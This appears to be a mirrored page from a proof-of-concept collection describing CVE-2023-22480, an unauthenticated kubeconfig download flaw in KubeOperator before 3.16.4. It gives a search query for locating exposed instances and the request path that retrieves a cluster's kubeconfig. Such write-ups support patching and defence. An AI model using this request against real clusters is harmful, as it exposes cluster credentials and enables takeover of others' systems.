admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480.md

39 lines
949 B
Markdown
Raw Normal View History

更新漏洞
2023-08-25 16:10:08 +08:00
# KubeOperator kubeconfig 未授权访问漏洞 CVE-2023-22480
## 漏洞描述
KubeOperator 是一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 Kubernetes 集群。CVE-2023-22480 中由于下载kubeconfig的路径不需要身份认证导致攻击者可直接下载kubeconfig获取相关敏感信息。
## 漏洞影响
KubeOperator < 3.16.4
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
更新漏洞
2023-08-25 16:10:08 +08:00
```
app="KubeOperator"
```
## 漏洞复现
登陆页面
![image-20230504140910659](images/image-20230504140910659.png)
在补丁中修复了配置文件下载接口的未授权
![image-20230504140927095](images/image-20230504140927095.png)
当集群存在时可通过接口未授权下载配置文件
![image-20230504140945600](images/image-20230504140945600.png)
验证POC (k8s为集群名称不固定)
```
/api/v1/clusters/kubeconfig/k8s
```
![image-20230504141007260](images/image-20230504141007260.png)
Reference in New Issue Copy Permalink